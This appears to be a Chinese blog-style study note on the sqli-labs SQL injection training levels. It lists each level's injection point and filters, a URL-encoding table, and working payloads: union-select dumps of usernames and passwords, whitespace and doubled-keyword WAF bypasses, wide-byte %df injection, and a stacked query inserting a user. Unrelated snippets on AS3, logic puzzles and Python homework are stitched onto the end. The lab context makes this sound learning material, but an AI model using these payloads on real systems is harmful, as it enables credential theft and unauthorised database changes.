或者更加全面的
注入天書pdf
前四關登入成功顯示使用者名稱,失敗報錯正常
第1關id=『1』
第2關id=1
第3關id=(『1』)
第4關id=(「1」)
第5關和6關登入顯示you are in…,失敗報錯正常
第5關id=『1』
第6關id=「1」
第7-10關盲注
第7關id=((『1』))
第8關id=『1』
第9關id=『1』
第10關id=「1」
第11關和12關登入成功顯示使用者名稱密碼,失敗報錯正常
第11關username=『admin』
第12關username=(『admin』)
第13關和14關登入成功不顯示,失敗報錯正常
第13關username=(『admin』)
第14關username=「admin」
第15關16關盲注
第15關username=『admin』
第16關username=(『admin』)
輸入字元長度超過15的部分截斷
字串中\x00,\n,\r,\,',",\x1a被轉義
純數字的話被強制轉換成整形
第18,19,20,21關username和password都被過濾了
第18關,在http頭useragent處注入,前提是成功登入
第19關,在http頭referer處注入,前提是登入成功
第20關,uname='cookie』注入
第21關,uname=(『cookie』)加密注入
第22關,uname="cookie"加密注入
-- 和 # 這兩個注釋符號\,",'and 和 or第25a關登入失敗不報錯
第25a關id=1
and,or,--,#,空格、製表符、換頁符,/*,//第26a關id=(『1』)
--,/*,空格,#,大小寫沒過濾完全完全的select,union第27a關沒有報錯
第27a關id=「1」
--,/*,/,空格,#,大小寫完全過濾的union+\s+select第28a關id=(『1』) 只過濾union+\s+select組合
?id=被waf過濾的部分&id=payload第30關id=「1」
第31關id=(「1」)
',「,\思路:堆疊注入(使用mysqli_multi_query導致的)
mysql基礎命令
create table test select * from users;
drop table test;
select load_file('/users/xjj/desktop/eval');
insert into users(id,username,password) values('100','new','new');
update test set name='test' where id=3;
第39關id=1
第40關id=(『1』)
第41關id=1
第42-45關:
login_user過濾 " / '
login_password='1'
第44關login_password=『1』
第45關login_password=(『1』)
思路:
order by和limit的注入
order by rand(true)隨機排序
order by rand(false)與true不同
rand(),時間盲注,procedure analyse注入
into outfile "/users/xjj/desktop/new"
第47關order by 『$id』
第48/49關盲注
第48關order by $id
第49關order by 『$id』
第50/51關在46關基礎上增加堆疊注入
第50關order by $id
第51關order by 『$id』
第52/53關盲注
第52關order by $id
第53關order by 『$id』
第54-57關和第1-4關一樣但是講究效率
第54關id=『1』
第55關id=(1)
第56關id=(『1』)
第57關id=「1」
union注入沒有回顯
第58關id=『1』
第59關id=1
第60關id=(「1」)
第61關id=((『1』))
盲注,用指令碼
! - %21
" - %22
# - %23
$ - %24
% - %25
& - %26
』 - %27
( - %28
) - %29
* - %2a
+ - %2b
, - %2c
- - %2d
. - %2e
/ - %2f
: - %3a
; - %3b
< - %3c
= - %3d
> - %3e
? - %3f
@ - %40
[ - %5b
\ - %5c
] - %5d
| - %7c
~ 0x7e
: 0x3a
%09 tab 鍵(水平)
%0a 新建一行
%0c 新的一頁
%0d return 功能
%0b tab 鍵(垂直)
%a0 空格
25
?id=』 union select 1,(select group_concat(username,passwoorrd separatoorr 0x3c62723e) from users),3 anandd 『1』=『1
26關暫時沒找到繞過\s正則的方法
27
?id=』%0bunion%0bselect%0b1,(select%0bgroup_concat(username,password%0bseparator%0b0x3c62723e)%0bfrom%0busers),3%0band%0b』1』=『1
28
?id=』)%0bunion%0bunion%0bselectselect%0b1,(select%0bgroup_concat(username,password%0bseparator%0b0x3c62723e)%0bfrom%0busers),3%0band%0b(『1
29
id=2&id=』 union select 1,(select group_concat(username,password separator 0x3c62723e) from users),3 and 『1』=『1
32
?id=-1%df%27%20union%20select%201,user(),2–+
34:burpsuite
uname=%df%27%0bunion%0bselect%0b1,(select%0bgroup_concat(username,password%0bseparator%0b0x3c62723e)%0bfrom%0busers)–+#&passwd=1&submit=submit
35
?id=-1%20union%20select%201,2,3;–+
36
?id=-1%df%27union%20select%201,2,3;±-+#
37:burpsuite
uname=%df』+union+select+1,2;±-+#&passwd=1&submit=submit
42burpsuite
login_user=admin&login_password=』+or+1=1;insert+into+users(username,password)+values(0x61,0x62);±-+#&mysubmit=login
AS3 技巧和提示
原文見 url color 444444 url 在 as3 中你可以通過 stage 類動態改變影片的幀速 所有的 displayobject 都有乙個 stage 屬性,通過他可以訪問當前 displayobject 所在例項的 stage.修改 stage 的 framerate 屬性就可以改...
經典邏輯筆試題和答案
1 有 1000瓶酒,其中只有一瓶有毒。現在用小白鼠進行實驗,小白鼠只要服用任意量有毒酒就會在24小時內死亡。問最少要用多少只小白鼠進行實驗 才能在24小時內檢測出哪瓶藥水有毒?這是乙個二進位制的問題,答案是用10只就可以。將1000瓶酒分別編號,用十隻小白鼠分別代表十位二進位制儲存,將編號為i的酒...
day4作業和答案
1.已知乙個數字列表,求列表中心元素。list1 10 206,3 89,23 9,12 count len list1 if count 1 print list1 count 2 else print list1 count 2 1 list1 count 2 2.已知乙個數字列表,求所有元素和...